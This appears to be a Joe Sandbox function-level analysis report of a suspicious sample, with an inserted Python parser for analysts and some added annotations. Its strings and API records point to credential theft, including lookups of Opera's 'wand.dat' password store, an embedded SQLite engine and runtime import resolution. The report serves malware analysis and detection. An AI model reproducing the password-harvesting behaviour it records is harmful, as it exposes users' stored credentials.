                                                                                                              Similarity
                                                                                                              • API ID: _memicmpwcslen
                                                                                                              • String ID: @@@@$History
                                                                                                              • API String ID: 1872909662-685208920
                                                                                                              • Opcode ID: b53e6bfe39813f40e33e088c97292d20a71445cfbc3f913cd0ff49abdb82a555
                                                                                                              • Instruction ID: 0314511eba11a06c501d0b319d6753a7178557fc2485e08f734f24cb460fdfed
                                                                                                              • Opcode Fuzzy Hash: b53e6bfe39813f40e33e088c97292d20a71445cfbc3f913cd0ff49abdb82a555
                                                                                                              • Instruction Fuzzy Hash: F1F0CD3310471157D210DE199C41A2BF7F8DB813A5F11063FF991A31C2D739EC658657
                                                                                                              APIs
                                                                                                              • memset.MSVCRT ref: 004100FB
                                                                                                              • memset.MSVCRT ref: 00410112
                                                                                                                • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                                                                • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                                                                              • _snwprintf.MSVCRT ref: 00410141
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: memset$_snwprintf_wcslwrwcscpy
                                                                                                              • String ID: </%s>
                                                                                                              • API String ID: 3400436232-259020660
                                                                                                              • Opcode ID: 5b9d86c37e8fc893e623c972aadbd746c4d139f4edb44e4e662c1ed71a902018
                                                                                                              • Instruction ID: d6b380c41b5e3e458bf6abeca455f552dea24a705517b0a2e3702c553642f250
                                                                                                              • Opcode Fuzzy Hash: 5b9d86c37e8fc893e623c972aadbd746c4d139f4edb44e4e662c1ed71a902018
                                                                                                              • Instruction Fuzzy Hash: 9B01DBF3D0012977D730A755CC46FEA76ACEF45304F0000B6BB08B3186DB78DA458A99
                                                                                                              APIs
                                                                                                              • memset.MSVCRT ref: 0040E770
                                                                                                              • SendMessageW.USER32(?,0000105F,00000000,?), ref: 0040E79F
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessageSendmemset
                                                                                                              • String ID: AE$"
                                                                                                              • API String ID: 568519121-1989281832
                                                                                                              • Opcode ID: b8b737cf360229c8c3c0ba8ae205d700f5cbc6e636b32f375fd4ccd57fc75389
                                                                                                              • Instruction ID: 5049a961280a3e8282645b70ff0f7bf8ff78c54eb6baa8beabb6daf17925e322
                                                                                                              • Opcode Fuzzy Hash: b8b737cf360229c8c3c0ba8ae205d700f5cbc6e636b32f375fd4ccd57fc75389
                                                                                                              • Instruction Fuzzy Hash: A701A239900204ABEB209F5ACC81EABB7F8FF44B45F008429E854A7291D3349855CF79
                                                                                                              APIs
                                                                                                              • memset.MSVCRT ref: 0040D58D
                                                                                                              • SetWindowTextW.USER32(?,?), ref: 0040D5BD
                                                                                                              • EnumChildWindows.USER32(?,Function_0000D4F5,00000000), ref: 0040D5CD
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ChildEnumTextWindowWindowsmemset
                                                                                                              • String ID: caption
                                                                                                              • API String ID: 1523050162-4135340389
                                                                                                              • Opcode ID: 0d93d59d75102ca4f37fb867a54fcac0e05f73641c093ad9b23abec7f1ae8059
                                                                                                              • Instruction ID: dcfab03f3ae0740f4c11e1fd8af26e22289cdce227bdcda27870e2dbaf68b2c3
                                                                                                              • Opcode Fuzzy Hash: 0d93d59d75102ca4f37fb867a54fcac0e05f73641c093ad9b23abec7f1ae8059
                                                                                                              • Instruction Fuzzy Hash: 50F08131D0031876FB206B95CC4EB8A3268AB04744F000076BE04B61D2DBB8EA44C69D
                                                                                                              APIs
                                                                                                                • Part of subcall function 00409BFD: memset.MSVCRT ref: 00409C07
                                                                                                                • Part of subcall function 00409BFD: wcscpy.MSVCRT ref: 00409C47
                                                                                                              • CreateFontIndirectW.GDI32(?), ref: 00401156
                                                                                                              • SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 00401175
                                                                                                              • SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 00401193
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
                                                                                                              • String ID: MS Sans Serif
                                                                                                              • API String ID: 210187428-168460110
                                                                                                              • Opcode ID: d52be591b3ab58c36f6074870949877e32a333ebc1fa33980d7036594a0e8467
                                                                                                              • Instruction ID: 44e142790c58e2983bb51e892a2c7280827b5342727586ee11fe1c2be2fb852b
                                                                                                              • Opcode Fuzzy Hash: d52be591b3ab58c36f6074870949877e32a333ebc1fa33980d7036594a0e8467
                                                                                                              • Instruction Fuzzy Hash: 7CF082B5A4030877EB326BA1DC46F9A77BDBB44B01F040935F721B91D1D3F4A585C658
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ClassName_wcsicmpmemset
                                                                                                              • String ID: edit
                                                                                                              • API String ID: 2747424523-2167791130
                                                                                                              • Opcode ID: da8fee05c6b158577436834c58d8e0793f5841ead652fa3e76a227b487c5742d
                                                                                                              • Instruction ID: aa36152fd255268de381ae2120198bffa1fffac517830ea88c39a2b7b5867ff0
                                                                                                              • Opcode Fuzzy Hash: da8fee05c6b158577436834c58d8e0793f5841ead652fa3e76a227b487c5742d
                                                                                                              • Instruction Fuzzy Hash: 86E0D872D8031E6AFB10EBA0DC4AFA977BCFB01708F0001B6B915E10C2EBB496494A45
                                                                                                              APIs
                                                                                                                • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                                                • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                              • GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 00414E2B
                                                                                                              • FreeLibrary.KERNEL32(00000000,?,00405751,00000000), ref: 00414E43
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                                              • String ID: SHAutoComplete$shlwapi.dll
                                                                                                              • API String ID: 3150196962-1506664499
                                                                                                              • Opcode ID: cdcb965da711456ca4b51fb43941328c5d6cb5423f9048b51d1f1fd4f659d43f
                                                                                                              • Instruction ID: 56be8aed7d941f739c6f69dc747e21d8edf2639efa9d7e462eda1ee05908af23
                                                                                                              • Opcode Fuzzy Hash: cdcb965da711456ca4b51fb43941328c5d6cb5423f9048b51d1f1fd4f659d43f
                                                                                                              • Instruction Fuzzy Hash: C1D0C2353002315BD6616B27AC04AAF2A99EFC13A1B054035F928D2210DBA84996827D
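The per-function records above (APIs with their call-site refs, memory dump source, and the Similarity block with API ID, String ID and fuzzy hashes) are what you pivot on when hunting related samples or mapping capabilities such as the runtime resolution of SHAutoComplete from shlwapi.dll. The following parser is an added example, not Joe Sandbox's own code: it turns this record layout into dicts, strips the "Download File" link residue the rendered page glues onto "Associated:" lines, and tolerates a final record that is cut short. SAMPLE_REPORT is a constructed excerpt modelled on two records above (snapshot file name shortened, some Similarity fields trimmed); the helper names are this example's own.

```python
"""Parse Joe Sandbox per-function records into dicts for pivoting on API
sequences and fuzzy hashes. Added example; layout inferred from the report."""
import re
from typing import Dict, List

# Constructed excerpt modelled on two records from the report (not verbatim).
SAMPLE_REPORT = r"""
APIs
  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
• GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 00414E2B
• FreeLibrary.KERNEL32(00000000,?,00405751,00000000), ref: 00414E43
Strings
Memory Dump Source
• Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_sample.jbxd
Similarity
• API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
• String ID: SHAutoComplete$shlwapi.dll
• API String ID: 3150196962-1506664499
• Opcode ID: cdcb965da711456ca4b51fb43941328c5d6cb5423f9048b51d1f1fd4f659d43f
• Instruction Fuzzy Hash: C1D0C2353002315BD6616B27AC04AAF2A99EFC13A1B054035F928D2210DBA84996827D
APIs
• memcpy.MSVCRT(?,00000000,00000030,00000000), ref: 0041D8A6
• memcmp.MSVCRT(?,?,00000030,?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041D8CB
Memory Dump Source
• Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_sample.jbxd
Similarity
• API ID: memcpy$memcmp
• String ID:
"""

SECTIONS = ("APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity")
# "<name>.<module>(<args>), ref: <hex>" or "<name>.<module> ref: <hex>", optionally
# prefixed with "Part of subcall function <hex>: ". Greedy args keep nested commas.
API_RE = re.compile(
    r"^(?:Part of subcall function (?P<subcall>[0-9A-Fa-f]+): )?"
    r"(?P<name>[^.\s(]+)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>.*)\))?,? ref: (?P<ref>[0-9A-Fa-f]+)$"
)
LINK_RESIDUE = "Download File"  # rendered-page link text glued onto Associated: lines


def _kv(line: str):
    key, _, value = line.partition(":")
    return key.strip(), value.strip().removesuffix(LINK_RESIDUE).strip()


def parse_records(text: str) -> List[Dict]:
    """Split report text into records; each record opens with an 'APIs' header."""
    records: List[Dict] = []
    rec = None
    section = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line in SECTIONS:
            if line == "APIs":
                rec = {"apis": [], "strings": [], "source": {"Associated": []}, "similarity": {}}
                records.append(rec)
            section = line
            continue
        if rec is None:
            continue  # text before the first record
        line = line.lstrip("•").strip()
        if section == "APIs":
            m = API_RE.match(line)
            if m is None:
                continue  # not a call line; skip rather than guess
            rec["apis"].append({
                "name": m["name"],
                "module": m["module"],
                "args": m["args"].split(",") if m["args"] else [],
                "ref": int(m["ref"], 16),
                "subcall": int(m["subcall"], 16) if m["subcall"] else None,
            })
        elif section == "Strings":
            rec["strings"].append(line)
        elif section == "Similarity":
            key, value = _kv(line)
            rec["similarity"][key] = value  # "String ID" may legitimately be empty
        else:  # Memory Dump Source and Joe Sandbox IDA Plugin share one dict
            key, value = _kv(line)
            if key == "Associated":
                rec["source"]["Associated"].append(value)
            else:
                rec["source"][key] = value
    return records


def records_calling(records: List[Dict], *names: str) -> List[Dict]:
    """Records whose API list (subcall entries included) covers every name given."""
    wanted = set(names)
    return [r for r in records if wanted <= {a["name"] for a in r["apis"]}]


def fuzzy_hash_index(records: List[Dict]) -> Dict[str, List[str]]:
    """Instruction Fuzzy Hash -> API IDs; incomplete records carry no hash and are skipped."""
    index: Dict[str, List[str]] = {}
    for r in records:
        h = r["similarity"].get("Instruction Fuzzy Hash")
        if h:
            index.setdefault(h, []).append(r["similarity"].get("API ID", ""))
    return index
```

Feed the whole function-analysis section to parse_records and query records_calling(recs, "LoadLibraryW", "GetProcAddress") to list every function that resolves imports at runtime, then carry the fuzzy_hash_index keys into your next report to spot shared code between dumps.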
                                                                                                              APIs
                                                                                                              • memcpy.MSVCRT(?,00000000,00000030,00000000), ref: 0041D8A6
                                                                                                              • memcpy.MSVCRT(?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041D8BC
                                                                                                              • memcmp.MSVCRT(?,?,00000030,?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041D8CB
                                                                                                              • memcmp.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,00000000), ref: 0041D913
                                                                                                              • memcpy.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041D92E
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                               • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                               • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                               • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: memcpy$memcmp
                                                                                                              • String ID:
                                                                                                              • API String ID: 3384217055-0
                                                                                                              • Opcode ID: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                                                                                              • Instruction ID: f5df6941464580ef2fdae31f27b7f31021858bb2d0e37ec30fcb1df3a02010a9
                                                                                                              • Opcode Fuzzy Hash: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                                                                                              • Instruction Fuzzy Hash: 8821B2B2E10249ABDB14EA91DC46EDF73FC9B44704F01442AF512D7181EB28E644C725
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                               • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                               • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                               • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: memset$memcpy
                                                                                                              • String ID:
                                                                                                              • API String ID: 368790112-0
                                                                                                              • Opcode ID: 8ce092fd9a5e59041eb9f85ad4e05697c1cc0ba7cb52d02734991e9cdc0d3c07
                                                                                                              • Instruction ID: abb90bdd0bd5c960a46cc99acd1c91865272cbbdb433919b32c204757dd19146
                                                                                                              • Opcode Fuzzy Hash: 8ce092fd9a5e59041eb9f85ad4e05697c1cc0ba7cb52d02734991e9cdc0d3c07
                                                                                                              • Instruction Fuzzy Hash: 0201FCB5740B007BF235AB35CC03F9A73A8AF52724F004A1EF153966C2DBF8A554819D
                                                                                                              APIs
                                                                                                                • Part of subcall function 004019D8: GetMenu.USER32(?), ref: 004019F6
                                                                                                                • Part of subcall function 004019D8: GetSubMenu.USER32(00000000), ref: 004019FD
                                                                                                                • Part of subcall function 004019D8: EnableMenuItem.USER32(?,?,00000000), ref: 00401A15
                                                                                                                 • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000412,?,00000000), ref: 00401A36 (0x412 = WM_USER+0x12, TB_GETSTATE when the target window is a toolbar control)
                                                                                                                 • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000411,?,?), ref: 00401A5A (0x411 = WM_USER+0x11, TB_SETSTATE for a toolbar control)
                                                                                                              • GetMenu.USER32(?), ref: 00410F8D
                                                                                                              • GetSubMenu.USER32(00000000), ref: 00410F9A
                                                                                                              • GetSubMenu.USER32(00000000), ref: 00410F9D
                                                                                                              • CheckMenuRadioItem.USER32(00000000,0000B284,0000B287,?,00000000), ref: 00410FA9
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                               • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                               • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                               • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Menu$ItemMessageSend$CheckEnableRadio
                                                                                                              • String ID:
                                                                                                              • API String ID: 1889144086-0
                                                                                                              • Opcode ID: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                                                                                                              • Instruction ID: be5000c07a60ff25a23af51018491178d5f127676f18bd69b4cc56e9e4830f27
                                                                                                              • Opcode Fuzzy Hash: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                                                                                                              • Instruction Fuzzy Hash: D5517171B40704BFEB20AB66CD4AF9FBAB9EB44704F00046EB249B72E2C6756D50DB54
                                                                                                              APIs
                                                                                                               • CreateFileMappingW.KERNEL32(?,00000000,00000004,00000000,?,00000000), ref: 004180B8 (flProtect 0x4 = PAGE_READWRITE)
                                                                                                               • MapViewOfFile.KERNEL32(00000000,00000006,00000000,?,?), ref: 004180E3 (dwDesiredAccess 0x6 = FILE_MAP_READ|FILE_MAP_WRITE, i.e. a writable view of the file)
                                                                                                              • GetLastError.KERNEL32 ref: 0041810A
                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00418120
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                               • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                               • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                               • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: File$CloseCreateErrorHandleLastMappingView
                                                                                                              • String ID:
                                                                                                              • API String ID: 1661045500-0
                                                                                                              • Opcode ID: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                                                                                                              • Instruction ID: 5cb71d9443798353a032a6b226e7c46d85178154149a60e532078a3cdb21b7c8
                                                                                                              • Opcode Fuzzy Hash: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                                                                                                              • Instruction Fuzzy Hash: 64518A71204706DFDB24CF25C984AA7BBE5FF88344F10492EF84287691EB74E895CB99
                                                                                                              APIs
                                                                                                                • Part of subcall function 00415A91: memset.MSVCRT ref: 00415AAB
                                                                                                              • memcpy.MSVCRT(?,?,?), ref: 0042EC7A
                                                                                                              Strings
                                                                                                              • Cannot add a column to a view, xrefs: 0042EBE8
                                                                                                              • sqlite_altertab_%s, xrefs: 0042EC4C
                                                                                                               • virtual tables may not be altered, xrefs: 0042EBD2 (this and the two strings above are SQLite's ALTER TABLE error messages from alter.c: a SQLite engine is compiled into the dumped image)
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                               • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                               • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                               • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: memcpymemset
                                                                                                              • String ID: Cannot add a column to a view$sqlite_altertab_%s$virtual tables may not be altered
                                                                                                              • API String ID: 1297977491-2063813899
                                                                                                              • Opcode ID: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                                                                                              • Instruction ID: f910cd7a27c7e389b2617bf4251edf561ae6288f62f29054cc1fb9bea0934792
                                                                                                              • Opcode Fuzzy Hash: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                                                                                              • Instruction Fuzzy Hash: 1E418E75A00615EFCB04DF5AD881A99BBF0FF48314F65816BE808DB352D778E950CB88
                                                                                                              APIs
                                                                                                              • memset.MSVCRT ref: 0040560C
                                                                                                                • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                                                                                                • Part of subcall function 0040D134: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                                                                                                • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002), ref: 0040D24C
                                                                                                                • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                                • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                                                                                                • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                                                                • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                                                                • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                                                                • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                                                • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                                                                • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                                                • Part of subcall function 0040A212: wcscpy.MSVCRT ref: 0040A269
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                               • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                               • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                               • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                                                               • String ID: *.*$dat$wand.dat (wand.dat is the saved-password store of the Presto-era Opera browser; "*.*" is a directory-enumeration wildcard)
                                                                                                              • API String ID: 2618321458-1828844352
                                                                                                              • Opcode ID: 0657051124b0d036bd635f999d135efdf1f0fa3481af6b00979a6af828487765
                                                                                                              • Instruction ID: e27ea46a2f82f1f177a07810d763c9ecc86b2647b265d762bc330c580f82b585
                                                                                                              • Opcode Fuzzy Hash: 0657051124b0d036bd635f999d135efdf1f0fa3481af6b00979a6af828487765
                                                                                                              • Instruction Fuzzy Hash: BF419B71600205AFDB10AF65DC85EAEB7B9FF40314F10802BF909AB1D1EF7999958F89
                                                                                                              APIs
                                                                                                                • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT(00000000,?,00000000,?,00410C56,?), ref: 0040ECF9
                                                                                                                • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000,?,00410C56,?), ref: 0040EDC0
                                                                                                              • wcslen.MSVCRT ref: 00410C74
                                                                                                              • _wtoi.MSVCRT(?,?,00000000,00000000,00000000,?,00000000), ref: 00410C80
                                                                                                              • _wcsicmp.MSVCRT ref: 00410CCE
                                                                                                              • _wcsicmp.MSVCRT ref: 00410CDF
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                               • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                               • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                               • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: _wcsicmp$??2@??3@_wtoiwcslen
                                                                                                              • String ID:
                                                                                                              • API String ID: 1549203181-0
                                                                                                              • Opcode ID: ea618d40444277bd221524d3c134f5417e022d6ba5f32085407bce5ff1a0f2d9
                                                                                                              • Instruction ID: d767fa7272777d82bc727b9b5621bf7cb5fcf48a3d465f11467ce1d5a1151d11
                                                                                                              • Opcode Fuzzy Hash: ea618d40444277bd221524d3c134f5417e022d6ba5f32085407bce5ff1a0f2d9
                                                                                                              • Instruction Fuzzy Hash: 5E4190359006089FCF21DFA9D480AD9BBB4EF48318F1105AAEC05DB316D6B4EAC08B99
                                                                                                              APIs
                                                                                                              • memset.MSVCRT ref: 00412057
                                                                                                                 • Part of subcall function 0040A116: ShellExecuteW.SHELL32(?,open,?,Function_0004E518,Function_0004E518,00000005), ref: 0040A12C (nShowCmd 5 = SW_SHOW)
